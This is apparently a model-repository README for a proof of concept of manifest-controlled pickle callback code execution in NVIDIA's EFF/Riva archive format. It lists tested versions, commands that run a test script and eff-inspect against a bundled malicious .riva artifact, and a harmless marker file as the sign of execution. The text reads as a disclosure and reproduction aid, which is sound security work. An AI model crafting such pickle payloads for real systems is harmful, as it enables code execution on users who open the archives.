YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
Riva / NVIDIA EFF Pickle Callback PoC
This directory contains a minimal .riva/EFF archive that demonstrates
manifest-controlled PickleContentCallback execution when a consumer reads an
artifact with the default Artifact.get_content() behavior.
Tested versions:
nvidia-eff==0.6.7nemo2rivacommit95db8a086d32db1021dfea6b307b119680d9ac7e
Reproduce:
python3 -m venv .venv-riva
.venv-riva/bin/pip install --extra-index-url https://pypi.nvidia.com nvidia-eff==0.6.7
rm -f /tmp/riva_eff_pickle_callback_executed
.venv-riva/bin/python test_eff_pickle_callback_rce.py
.venv-riva/bin/eff-inspect poc/malicious-pickle-callback.riva content -a artifacts:payload.bin
cat /tmp/riva_eff_pickle_callback_executed
Expected marker:
eff_pickle_callback_executed
Artifact:
poc/malicious-pickle-callback.riva- SHA256:
71502a162533d0cb5fca537b8bb8bcb7a5841047ab9d25277a9161b4c5f1f95b
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support